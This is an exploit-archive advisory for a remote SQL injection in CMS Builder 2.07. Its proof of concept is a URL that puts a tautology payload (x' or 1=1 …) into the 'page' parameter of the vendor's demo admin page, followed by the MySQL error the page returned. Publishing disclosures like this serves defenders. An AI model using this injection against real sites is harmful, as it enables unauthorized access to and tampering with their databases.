CMS Builder 2.07 SQL Injection

CMS Builder 2.07 SQL Injection: Posted Mar 27, 2015; Authored by Provensec; CMS Builder version 2.07 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | c4201a21853e4a6784d1c052e5fbb68edb638e21dcf654d0dd2c9e82dbe865f2; Download | Favorite | View

CMS Builder 2.07 SQL Injection

# Affected software: CMS Builder v2.07
# Type of vulnerability: sql injection
# URL: http://demo2.interactivetools.com/cmsbuilder2/bottom.php
# Discovered by: Provensec
# Website: http://www.provensec.com

#versionv2.07
# Proof of concept

http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=payload


demo:->

http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=x%27%20or%201=1%20or%20%27x%27=%27y



MySQL Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'-25' at line 9

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

CMS Builder 2.07 SQL Injection

CMS Builder 2.07 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMS Builder 2.07 SQL Injection

Share This

CMS Builder 2.07 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems